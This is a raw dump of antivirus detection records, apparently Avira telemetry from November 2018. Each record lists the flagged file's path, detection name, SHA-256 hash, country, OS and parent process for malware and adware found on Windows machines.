  Row(detection=Row(filename='avscan-20181101-154543-59e5f560', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154543-59E5F560', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0024403.exe', filepath='\\\\?\\D:\\System Volume Information\\_restore{726DFCED-3DF5-404C-B3E0-BCC96F47927F}\\RP8\\A0024403.exe', filesize=768000, name='TR/Patched.Ren.Gen.#M300.#R5151'), hash='47746f0823a1adc0d5f9c750346e11a25a71e72594eb22b71850271c08ba9db2', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:31:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diagnosticshub.standardcollector.service.exe', filepath='C:\\Windows\\System32\\DiagSvcs\\DiagnosticsHub.StandardCollector.Service.exe', filesize=64000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='0375a8abdd68739293e8746e0bcc449686ed62bb2b114ce363695c4b09e83bfc', metadata=Row(cmdline=None, country='MU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:37:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141410-fb0ae709', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0197bd9\\AVSCAN-20181101-140354-BD0DC590\\AVSCAN-20181101-141410-FB0AE709', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:14:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='C:\\Program Files (x86)\\Common Files\\HTTPERR\\MsiexeC64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T05:38:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='202601908.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\202601908.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='\\\\\\/DB', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Driver Booster\\6.0.2\\MlwScan.exe', parentsize=690960, timestamp='2018-11-01T19:25:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111436-16101449', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111436-16101449', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:14:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='agglglobalhistory.exe', filepath='C:\\Users\\X\\Downloads\\Chekeadores Netflix\\X-Slayer Checker Pack\\X-Slayer Checker Pack\\Steam Accounts Checker By X-SLAYER\\AgGlGlobalHistory.exe', filesize=832000, name='HEUR/AGEN.1035486.#M1.#R1'), hash='5890aa5913029b55ee7100865dd3e543f169ce1b9fc1d7557decf16cde38a924', metadata=Row(cmdline='EULA', country='PY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\esetonlinescanner_esl.exe', parentsize=6986872, timestamp='2018-11-01T07:17:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210723-bd0263f2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c35755c0\\AVSCAN-20181101-205751-6D3D76CC\\AVSCAN-20181101-210723-BD0263F2', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='cd2a73795bcd963999c929a1ad3f17695eb7e5773effdc96473fca2dc8cc20de', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:37:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pack200.exe', filepath='C:\\Program Files\\Java\\jre6\\bin\\pack200.exe', filesize=116000, name='W32/Sality.AW.#M1.#R1'), hash='9a5b0a4ee9155a581c307d5dbd0935c8ed26a1788aa21112ced161cb8a614be8', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T02:56:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:44:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='snailmail.exe', filepath='G:\\ألعاب\\Removable Disk\\Removable Disk\\t\\SnailMail.exe', filesize=3072000, name='W32/Virut.Gen.#M1.#R1'), hash='8e8e9ad3cdd5bc9aa6ff06062ff8e884d6a03f31c08e84df1743eb9415135347', metadata=Row(cmdline='\\\\\\/flags:0x0', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\LogonUI.exe', parentsize=10752, timestamp='2018-11-01T01:27:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files (x86)\\InstallShield Installation Information\\{D0956C11-0F60-43FE-99AD-524E833471BB}\\setup.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='a981964e6814f4780e9fb4a31fe8445ac0fc556297fc99a0795fa34e86c47faf', metadata=Row(cmdline='--engine=2 --session-id=7Je8mv\\\\\\/QkliHuUg9s+aE\\\\\\/mQ8p2PdlsYint84TCHs --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=13449336, timestamp='2018-11-01T11:45:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220819-90ed6665', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-220739-8B38A345\\AVSCAN-20181101-220819-90ED6665', filesize=1600000, name='TR/Patched.Ren.Gen4.#M1.#R1'), hash='7c8a842ab8047ece3e5dd6f562fdb8e680c0fb07ff04d3f220a25297cfc9e7f7', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:08:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124244-b47afbc1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-124222-A204443D\\AVSCAN-20181101-124244-B47AFBC1', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:42:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121021-3a4cb869', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-120959-27BEEFD0\\AVSCAN-20181101-121021-3A4CB869', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:10:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-063159-b814d827', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_70573062\\AVSCAN-20181101-063128-B431378D\\AVSCAN-20181101-063159-B814D827', filesize=64000, name='PUA/Vittalia.#M1.#R1'), hash='5fe522ad087cda06a9caafd79516ca2837642e8bea15fe103f58aada98aae3b1', metadata=Row(cmdline=None, country='HT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_5_10_4.html', filepath='C:\\Users\\This\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\Photoshop 7.0\\Help\\1_5_10_4.html', filesize=220000, name='VBS/Ramnit.abcd.#M0.#R0'), hash='94b3a6321554e84ddf30003a26b3548395657219dde3c215632f1b011a0b42f4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:07:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111110-fc16521d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111110-FC16521D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:10:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\Temp\\TrustedInstaller.exe', filesize=192000, name='BDS/Androm.EB.73.#M0.#R0'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T10:44:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='d8b09e6f6981fc67b7bd0985b0582d40119f690b778cfa8dfee3a63e65904faa', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:10:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122530-41cff98f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122457-25EE9C0F\\AVSCAN-20181101-122530-41CFF98F', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:25:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-020519-254a6e8d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cd5703d2\\AVSCAN-20181101-020438-1B8697BC\\AVSCAN-20181101-020519-254A6E8D', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:05:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110150-b5772d33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110150-B5772D33', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-01T22:09:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002300-3bd55ad7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002300-3BD55AD7', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='css.exe', filepath='F:\\New folder\\[IBRASoftware.com] CorelDrawX8 (x64)\\Lang\\br\\Help\\css\\css.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:16:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1431f8b6e909c2a167b36bc0b0ccd5e3a914a24b553a734d1e11c70af915ccec', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-20.categorizing\\1431F8B6E909C2A167B36BC0B0CCD5E3A914A24B553A734D1E11C70AF915CCEC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1431f8b6e909c2a167b36bc0b0ccd5e3a914a24b553a734d1e11c70af915ccec', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T08:13:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181116-524282a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_70205740\\AVSCAN-20181101-181101-500C7B49\\AVSCAN-20181101-181116-524282A5', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b2af8', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b2af8', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:53:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002131-323988af', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002131-323988AF', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:21:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-140244-da3cf9d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_63ecec90\\AVSCAN-20181101-140228-D7D7F44F\\AVSCAN-20181101-140244-DA3CF9D8', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.498\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.498\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:02:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='5a25bf21cb05983213784b828ad74b7798bb00285c8431e798e639f33885b064', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:13:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005510-21fddcf6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-235245-023F16A9\\AVSCAN-20181102-005510-21FDDCF6', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:55:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5c45b0e717ec785818796cccd5ef52705bb98997101d8a414549f1e98a907441', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\5C45B0E717EC785818796CCCD5EF52705BB98997101D8A414549F1E98A907441', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5c45b0e717ec785818796cccd5ef52705bb98997101d8a414549f1e98a907441', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T10:20:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gardeningenthusiast-ttab02-2ac3e9e9cf35202ad2827766ceade26b.exe', filepath='C:\\Users\\X\\Desktop\\source\\MS\\InProd20181026-Tooltab\\GardeningEnthusiast-TTAB02-2AC3E9E9CF35202AD2827766CEADE26B.exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='152da9afd217d12b308a9ea213795cd2c3ea4636b4796140ee8177e744966031', metadata=Row(cmdline='x c:\\\\\\\\users\\\\\\\\X\\\\\\\\desktop\\\\\\\\source.7z -oc:\\\\\\\\users\\\\\\\\test_user\\\\\\\\desktop\\\\\\\\source\\\\\\\\ -pinfected', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Avira_Scripts\\7za.exe', parentsize=587776, timestamp='2018-11-01T04:29:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T15:58:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='150c1ae293ee6c85c21683021670a64ec4944ff46f37c517373a82a958676835', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-01T10:14:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T01:20:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002018-f2497398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234829-DD2407AD\\AVSCAN-20181102-002018-F2497398', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:20:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='E:\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='E:\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T16:23:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0cf7b7603468b52421f49498fdbea5d0fac75a5901f281c7eeca132f2c197b9d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-16.available\\Avira\\0CF7B7603468B52421F49498FDBEA5D0FAC75A5901F281C7EECA132F2C197B9D', filesize=1792000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='0cf7b7603468b52421f49498fdbea5d0fac75a5901f281c7eeca132f2c197b9d', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:49:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msn.exe', filepath='C:\\Program Files (x86)\\win\\msn.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='59fb8d2680c3449fe6c9b9a0b9143f330bda5d1bd735fac65773316788c06532', metadata=Row(cmdline=None, country='UY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T14:59:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hw_tool_en.exe', filepath='D:\\7\\BackUp Files\\New Download\\Installer\\BOX\\MRT\\mrt_2.60_lastupdate\\date\\hw_tool_en.exe', filesize=6272000, name='W32/Sality.AG.#M1.#R1'), hash='3c307435a70ea686152da6c601dd435255c539e0fca58d372f5bf484f3871a8c', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\BlueStacks\\HD-Network.exe', parentsize=451800, timestamp='2018-11-01T02:19:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate (1).exe', filepath='C:\\Documents and Settings\\X\\Mes documents\\Downloads\\flashupdate (1).exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='eb812853fb6d15b4d726921d8413f53610beae48458f76537009f4cc2b8674af', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:42:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='esempi fatture.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\INFORMATICA\\ECDL\\Esercizi Excel\\Esempi Fatture.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:24:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095026-4382c28e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095026-4382C28E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:50:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='alzheimer.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\SCHEDE CORSI SOCIOSANITARI\\ALZHEIMER.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:16:25Z'), dt=datetime.date(2018, 11, 1)),
